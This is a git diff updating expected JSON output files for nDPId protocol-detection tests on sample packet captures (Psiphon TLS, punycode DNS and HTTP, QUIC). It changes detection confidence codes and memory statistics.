+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613865079123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1613865079123,"pkt":"RQAAPJ+KQABABtpRwKgAZ2gSl76ebQG7Qi4DFAAAAACgAv\/\/BPgAAAIEBbQEAggKAB2cngAAAAABAwMJ"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613865079129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1613865079129,"pkt":"RQAAPJ+KQABABtpRwKgAZ2gSl76ebQG7Qi4DFAAAAACgAv\/\/BPgAAAIEBbQEAggKAB2cngAAAAABAwMJ"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1613865079140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1613865079140,"pkt":"RQAANAAAQAA8Bn3kaBKXvsCoAGcBu55t3jKOvkIuAxWAEv\/\/W\/0AAAIEBXgBAQQCAQMDCg=="} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613865079123,"flow_last_seen":1613865079143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1613865079143,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS 
Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"2d703033628575a99d44820c43b84876","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01025{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1613865079123,"flow_last_seen":1613865079168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1796,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1613865079168,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"2d703033628575a99d44820c43b84876","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01320{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1613865079123,"flow_last_seen":1613865079168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2758,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1613865079168,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": 
{"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Psiphon","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"sni.cloudflaressl.com,psiphon3.net,*.psiphon3.net","ja3":"2d703033628575a99d44820c43b84876","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"49:30:DE:8F:B7:AF:C3:76:40:09:44:15:B4:6B:D9:8F:BE:0C:6B:0C"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":62,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1613865079123,"flow_last_seen":1613865079845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9274,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1613865079845,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Psiphon","breed":"Acceptable","category":"VPN"}} 
+00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":62,"source":"psiphon3.pcap","alias":"nDPId-test","packets-captured":62,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":9274,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1613865079845} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 62/62 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 9274 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6009544 bytes +~~ total memory freed........: 6009544 bytes +~~ total allocations/frees...: 120947/120947 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 456 chars +~~ json string max len.......: 1325 chars +~~ json string avg len.......: 863 chars diff --git a/test/results/punycode-idn.pcap.out b/test/results/punycode-idn.pcap.out index 5eda3a827..380f57880 100644 --- a/test/results/punycode-idn.pcap.out +++ b/test/results/punycode-idn.pcap.out 
@@ -2,22 +2,22 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643874953669} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643874953669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1643874953669,"pkt":"BBjWBrNamAGnpQyTCABFAAA3T1gAAEARpYDAqAKMwKgCAbHQADUAI+SVpXsBAAABAAAAAAAAAWkEc2NkbgJjbwAAAQAB"} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643874953689,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1643874953689,"pkt":"mAGnpQyTBBjWBrNaCABFAAByB3NAAEARrSrAqAIBwKgCjAA1sdAAXmq0pXuBgAABAAIAAAAAAWkEc2NkbgJjbwAAAQABwAwABQABAAAACwAfBnNjZG5jbwdzcG90aWZ5A21hcAZmYXN0bHkDbmV0AMAnAAEAAQAAAB4ABJJLPvg="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874953689,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"146.75.62.248"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874953689,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"146.75.62.248"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643874953695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953695,"pkt":"BBjWBrNamAGnpQyTCABFAABDinIAAEARalrAqAKMwKgCAer8ADUAL4QJ+wUBAAABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643874953696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953696,"pkt":"mAGnpQyTBBjWBrNaCABFAABDB3RAAEARrVjAqAIBwKgCjAA16vwALwOG+wWBgwABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1068,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1643874962305} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872149 bytes -~~ total memory freed........: 5872149 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6005783 bytes +~~ total memory freed........: 6005783 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 790 chars diff --git a/test/results/quic-23.pcap.out b/test/results/quic-23.pcap.out index fb7784a9d..4ec4344fe 100644 --- a/test/results/quic-23.pcap.out +++ b/test/results/quic-23.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1568282515655} 00639{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
